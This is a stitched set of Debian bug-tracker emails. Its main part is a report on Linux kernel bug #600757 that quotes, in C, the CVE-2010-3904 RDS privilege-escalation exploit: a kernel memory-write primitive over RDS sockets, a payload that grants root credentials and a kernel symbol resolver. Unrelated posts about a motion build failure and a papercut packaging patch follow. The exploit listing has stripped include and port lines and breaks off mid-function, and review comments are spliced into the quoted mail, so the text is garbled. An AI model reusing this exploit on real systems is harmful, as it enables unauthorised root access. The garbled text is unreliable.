Bug#600757: Possible Fix
tag 600757 pending thanks This patch can fix it: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f -- Juan Angulo Moreno -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#600757: linux-2.6: Linux RDS Protocol Local Privilege Escalation
Package: linux-2.6 Version: 2.6.32-5-686 Severity: critical Tags: security Justification: root security hole There is a security hole in all versions of linux-2.6 distributed by Debian. The attached exploit code can be used to test if a kernel is vulnerable; it starts a root shell. I tested it in Debian Squeeze; a screenshot can be found at http://i56.tinypic.com/2nh19v6.png -- Juan Angulo Moreno /* * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit * CVE-2010-3904 * by Dan Rosenberg * * Copyright 2010 Virtual Security Research, LLC * * The handling functions for sending and receiving RDS messages * use unchecked __copy_*_user_inatomic functions without any * access checks on user-provided pointers. As a result, by * passing a kernel address as an iovec base address in recvmsg-style * calls, a local user can overwrite arbitrary kernel memory, which * can easily be used to escalate privileges to root. Alternatively, * an arbitrary kernel read can be performed via sendmsg calls. * * This exploit is simple - it resolves a few kernel symbols, * sets the security_ops to the default structure, then overwrites * a function pointer (ptrace_traceme) in that structure to point * to the payload. After triggering the payload, the original * value is restored. Hard-coding the offset of this function * pointer is a bit inelegant, but I wanted to keep it simple and * architecture-independent (i.e. no inline assembly). * * The vulnerability is yet another example of why you shouldn't * allow loading of random packet families unless you actually * need them. 
* Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 * NOTE(review): this is the CVE-2010-3904 proof of concept as quoted in
 * the Debian bug report. The upstream fix is the kernel commit linked
 * earlier in this thread (799c10559d60f159ab2232203f222f18fa3c4a5f).
 * Until a fixed kernel is installed, the mitigation the header itself
 * points at applies: do not allow the rds protocol family to be loaded
 * on hosts that do not need it.
 */

/*
 * NOTE(review): the mailing-list rendering stripped the <...> header names
 * from every #include below and the numeric values from the two port
 * #defines, so this listing does not compile as shown. They are left as
 * found rather than reconstructed.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define RECVPORT
#define SENDPORT

/*
 * prep_sock - open an RDS socket and bind it to 127.0.0.1:port.
 *
 * PF_RDS / SOCK_SEQPACKET is the protocol family whose send/receive
 * paths are vulnerable (see the header comment). Both sockets used by
 * the exploit come from here; any failure ends the process with
 * exit(-1), so the caller never sees an invalid descriptor.
 *
 * Defender's note: socket() only succeeds when the rds module is
 * available (presumably auto-loaded on demand, which is the point the
 * header makes about unneeded packet families).
 */
int prep_sock(int port)
{
	int s, ret;
	struct sockaddr_in addr;

	s = socket(PF_RDS, SOCK_SEQPACKET, 0);
	if(s < 0) {
		printf("[*] Could not open socket.\n");
		exit(-1);
	}

	memset(&addr, 0, sizeof(addr));
	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port);

	ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));
	if(ret < 0) {
		printf("[*] Could not bind socket.\n");
		exit(-1);
	}

	return s;
}

/*
 * get_message - receive one pointer-sized datagram into `address`.
 *
 * `address` is handed to recvfrom() unchanged as the receive buffer. On
 * a vulnerable kernel the RDS receive path copies the payload to that
 * pointer without an access check (per the header comment), so a kernel
 * address here becomes a write into kernel memory; this is the primitive
 * write_to_mem() is built on. The recvfrom() return value is ignored.
 */
void get_message(unsigned long address, int sock)
{
	recvfrom(sock, (void *)address, sizeof(void *), 0, NULL, NULL);
}

/*
 * send_message - send `value` as a single pointer-sized RDS datagram to
 * 127.0.0.1:RECVPORT over `sock`.
 *
 * The datagram carries exactly one iovec whose base is the local copy
 * `buf`, so the bytes that land in the receiver's buffer are the raw
 * representation of `value`. Aborts the process on a sendmsg() failure.
 * `size` is assigned but never read.
 */
void send_message(unsigned long value, int sock)
{
	int size, ret;
	struct sockaddr_in recvaddr;
	struct msghdr msg;
	struct iovec iov;
	unsigned long buf;

	memset(&recvaddr, 0, sizeof(recvaddr));
	size = sizeof(recvaddr);

	recvaddr.sin_port = htons(RECVPORT);
	recvaddr.sin_family = AF_INET;
	recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");

	memset(&msg, 0, sizeof(msg));
	msg.msg_name = &recvaddr;
	msg.msg_namelen = sizeof(recvaddr);
	msg.msg_iovlen = 1;

	buf = value;

	/* one iovec pointing at the value to deliver */
	iov.iov_len = sizeof(buf);
	iov.iov_base = &buf;
	msg.msg_iov = &iov;

	ret = sendmsg(sock, &msg, 0);
	if(ret < 0) {
		printf("[*] Something went wrong sending.\n");
		exit(-1);
	}
}

/*
 * write_to_mem - deliver `value` to address `addr` via the RDS pair.
 *
 * The parent blocks in get_message() on recvsock with `addr` as the
 * buffer while a forked child waits one second and then sends `value`
 * on sendsock; the parent reaps the child afterwards. The sleep(1) is
 * the only ordering between the two (presumably so the parent's
 * recvfrom() is already pending when the datagram arrives). The fork()
 * result is not checked: a fork() failure (-1) is truthy, so the parent
 * would take the else branch and block with no sender.
 */
void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{
	if(!fork()) {
		sleep(1);
		send_message(value, sendsock);
		exit(1);
	} else {
		get_message(addr, recvsock);
		wait(NULL);
	}
}

/*
 * Function-pointer types for the two kernel credential helpers the
 * payload calls. regparm(3) matches the i386 kernel's register-argument
 * calling convention. The two globals are populated elsewhere in the
 * file (the header says the exploit resolves kernel symbols; the
 * resolver get_kernel_sym() follows below). Note that file-scope names
 * beginning with an underscore are reserved identifiers in C.
 */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

/*
 * getroot - the payload. Per the header comment it is installed in place
 * of the ptrace_traceme hook in security_ops, so it runs in kernel
 * context when that hook fires. It applies freshly prepared kernel
 * credentials to the calling task via the two resolved helpers and
 * returns -1 (presumably so the hooked ptrace call itself is refused).
 * Both parameters are unused.
 */
int __attribute__((regparm(3))) getroot(void * file, void * vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

/* thanks 
spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr
Bug#517568: Waiting for sponsorship
Hi, I have uploaded the package to mentors.debian.net (http://mentors.debian.net/debian/pool/main/m/motion/motion_3.2.11-2.dsc) and am currently waiting for sponsorship. -- Juan Angulo Moreno -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#482231: motion: FTBFS: checking size of short int... configure: error: cannot compute sizeof (short int)
Hi Lucas, I built motion 3.2.9-2 on an amd64 node with Sid and it built successfully. You can see the log here: http://0x29.com.ve/debian/motion/logs/00_checking_size_of_short_int.txt I use Gcc 4.3: [EMAIL PROTECTED]:~/pkgs/motion/tmp/motion-3.2.9$ x86_64-linux-gnu-gcc -v Usando especificaciones internas. Objetivo: x86_64-linux-gnu Configurado con: ../src/configure -v --with-pkgversion='Debian 4.3.0-5' --with-bugurl=file:///usr/share/doc/gcc-4.3/README.Bugs --enable-languages=c,c++,fortran,objc,obj-c++ --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.3 --program-suffix=-4.3 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-cld --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu Modelo de hilos: posix gcc versión 4.3.1 20080523 (prerelease) (Debian 4.3.0-5) Lucas Nussbaum escribió: > Package: motion > Version: 3.2.9-2 > Severity: serious > User: [EMAIL PROTECTED] > Usertags: qa-ftbfs-20080520 qa-ftbfs > Justification: FTBFS on i386 > > Hi, > > During a rebuild of all packages in sid, your package failed to build on > i386. > > This rebuild was done with gcc 4.3 instead of gcc 4.2, because gcc 4.3 > is now the default on most architectures (even if it's not the case on > i386 yet). Consequently, many failures are caused by the switch to gcc > 4.3. > If you determine that this failure is caused by gcc 4.3, feel free to > downgrade this bug to 'important' if your package is only built on i386, > and this bug is specific to gcc 4.3 (i.e the package builds fine with > gcc 4.2). > > Relevant part: >> /usr/bin/fakeroot debian/rules clean >> dh_testdir >> dh_testroot >> rm -f build-stamp configure-stamp >> [ ! 
-f Makefile ] || /usr/bin/make distclean >> rm -f config.{sub,guess,log,status} >> dh_clean >> dpkg-source -b motion-3.2.9 >> dpkg-source: info: using source format `1.0' >> dpkg-source: info: building motion using existing motion_3.2.9.orig.tar.gz >> dpkg-source: info: building motion in motion_3.2.9-2.diff.gz >> dpkg-source: info: building motion in motion_3.2.9-2.dsc >> debian/rules build >> dh_testdir >> cp -f /usr/share/misc/config.guess config.guess >> cp -f /usr/share/misc/config.sub config.sub >> # Add here commands to configure the package. >> CFLAGS="-Wall -g -O2" LDFLAGS="-Wl,--as-needed" ./configure \ >> --prefix=/usr \ >> --bindir=\${prefix}/bin \ >> --build=i486-linux-gnu \ >> --host=i486-linux-gnu \ >> --datadir=\${prefix}/share \ >> --mandir=\${datadir}/man \ >> --infodir=\${datadir}/info \ >> --sysconfdir=/etc/motion \ >> --with-ffmpeg \ >> --with-mysql \ >> --with-pgsql \ >> --without-optimizecpu \ >> --without-jpeg-mmx >> checking for Darwin... no >> checking for *BSD... no >> checking for i486-linux-gnu-gcc... i486-linux-gnu-gcc >> checking for C compiler default output file name... a.out >> checking whether the C compiler works... yes >> checking whether we are cross compiling... no >> checking for suffix of executables... >> checking for suffix of object files... o >> checking whether we are using the GNU C compiler... yes >> checking whether i486-linux-gnu-gcc accepts -g... yes >> checking for i486-linux-gnu-gcc option to accept ISO C89... none needed >> checking for pthread_create in -lpthread... yes >> checking for libjpeg-mmx... skipping >> checking for jpeg_set_defaults in -ljpeg... yes >> checking how to run the C preprocessor... i486-linux-gnu-gcc -E >> checking for grep that handles long lines and -e... /bin/grep >> checking for egrep... /bin/grep -E >> checking for ANSI C header files... yes >> checking for sys/types.h... yes >> checking for sys/stat.h... yes >> checking for stdlib.h... yes >> checking for string.h... 
yes >> checking for memory.h... yes >> checking for strings.h... yes >> checking for inttypes.h... yes >> checking for stdint.h... yes >> checking for unistd.h... yes >> checking mjpegtools/jpegutils.h usability... no >> checking mjpegtools/jpegutils.h presence... no >> checking for mjpegtools/jpegutils.h... no >> checking mjpegtools/mjpeg_types.h usability... no >> checking mjpegtools/mjpeg_types.h presence... no >> checking for mjpegtools/mjpeg_types.h... no >> checking mjpegtools... no >> checking for ffmpeg autodetecting... found for debian >> checking for ffmpeg headers... found for debian >> checking file_protocol is defined in ffmpeg ?... no >> checking for mysql support... testing >> checking autodect mysql headers... yes >> checking autodect mysql libs... found >> checking for PostgreSQL... yes >> checking for PQcmdTuples in -lpq... no >> checking for PQoidValue in -lpq... no >> checking for PQclientEncoding in -lpq..
Bug#462864: Patch
Package: papercut Version: 0.9.13-4.1 Severity: serious Tags: patch Hi, In the attachment you will find the patch to repair this bug. -- Juan Angulo Moreno --- System information. --- Architecture: i386 Kernel: Linux 2.6.22-3-686 Debian Release: lenny/sid --- Package information. --- Depends (Version) | Installed =-+-=== adduser | 3.105 python| 2.4.4-6 python-support (>= 0.7.1) | 0.7.6
diff -urNp papercut-0.9.13/debian/changelog papercut-0.9.13_new/debian/changelog
--- papercut-0.9.13/debian/changelog 2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/changelog 2008-02-21 23:43:53.0 -0430
@@ -1,3 +1,15 @@
+papercut (0.9.13-4.1) unstable; urgency=low
+
+ * Non-maintainer upload.
+ * Added debian/papercut.postinst with user/group creation. (Closes: #462864)
+ * Fixed debian/papercut.postrm with delete user support.
+ * Fixed debian/papercut.init (with user daemon support).
+ * Added debian/pyDaemon.py library.
+ * Fixed papercut script with pyDaemon.py.
+ * Fixed .pid file (Its uses the default directory /var/run/papercut).
+
+ -- Juan Angulo Moreno <[EMAIL PROTECTED]> Wed, 20 Feb 2008 03:29:33 -0430
+
 papercut (0.9.13-4) unstable; urgency=low
 
 * Switch to the new Python Policy. (Closes: #380886)
diff -urNp papercut-0.9.13/debian/control papercut-0.9.13_new/debian/control
--- papercut-0.9.13/debian/control 2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/control 2008-02-21 18:50:45.0 -0430
@@ -2,14 +2,15 @@ Source: papercut
 Section: news
 Priority: optional
 Maintainer: Jérémy Bobbio <[EMAIL PROTECTED]>
-Build-Depends: debhelper (>= 5.0.37.2), python-support (>= 0.3)
+Build-Depends: debhelper (>= 5.0.37.2), python-support (>= 0.3), dpatch
 Build-Depends-Indep: python, xsltproc, docbook-xsl
-Standards-Version: 3.7.2
+Standards-Version: 3.7.3
+HomePage: http://pessoal.org/papercut/
 XS-Python-Version: current
 
 Package: papercut
 Architecture: all
-Depends: ${python:Depends}
+Depends: ${python:Depends}, adduser
 XB-Python-Version: ${python:Versions}
 Recommends: python-mysqldb, python-pgsql
 Suggests: phpbb2, mysql-server
@@ -32,5 +33,3 @@ Description: simple and extensible NNTP
Please note that Papercut is only a NNTP server, not a full-featured news transport system. It does not handle newsfeeding or other usual news software features.
- .
- Homepage: http://pessoal.org/papercut/
diff -urNp papercut-0.9.13/debian/copyright papercut-0.9.13_new/debian/copyright
--- papercut-0.9.13/debian/copyright 2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/copyright 2008-02-21 19:20:47.0 -0430
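Review bot: The new `HomePage:` field added in the first hunk of debian/control is conventionally spelled `Homepage:`; dpkg parses field names case-insensitively so the package still builds, but Policy and the tools that consume this field use `Homepage`, so I would change the added line to `+Homepage: http://pessoal.org/papercut/`. Moving the URL out of the long description (the second hunk drops the `Homepage:` pseudo-field there) is the right direction, so this is only a spelling point. The added `adduser` dependency matches the changelog's postinst user creation, though the postinst itself is not part of this excerpt, so I cannot confirm how the user and group are created.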
@@ -10,25 +10,47 @@ Changes: The docs/ directory and its content was removed: IETF RFCs are non-free in the DFSG sense. +Files: * Copyright: - (c) 2002-2005 Joao Prado Maia <[EMAIL PROTECTED]> - - Permission is hereby granted, free of charge, to any person obtaining a - copy of this software and associated documentation files (the "Software"), - to deal in the Software without restriction, including without limitation - the rights to use, copy, modify, merge, publish, distribute, sublicense, - and/or sell copies of the Software, and to permit persons to whom the - Software is furnished to do so, subject to the following conditions: - - The above copyright notice and this permission notice shall be included in - all copies or substantial portions of the Software. - - THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - SOFTWARE. +(c) 2002-2005 Joao Prado Maia <[EMAIL PROTECTED]> + Permission is hereby granted, free of charge, to any person obtaining a + copy of this software and associated documentation files (the "Software"), + to deal in the Software without restriction, including without limitation + the rights to use, copy, modify, merge, publish, distribute, sublicense, + and/or sell copies of the Software, and to permit persons to whom the + Software is furnished to do so, subject to the following conditions: + + The above copyright notice and this permission notice shall be included in + all copies or substantial portions of the Software. 
+ + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVEN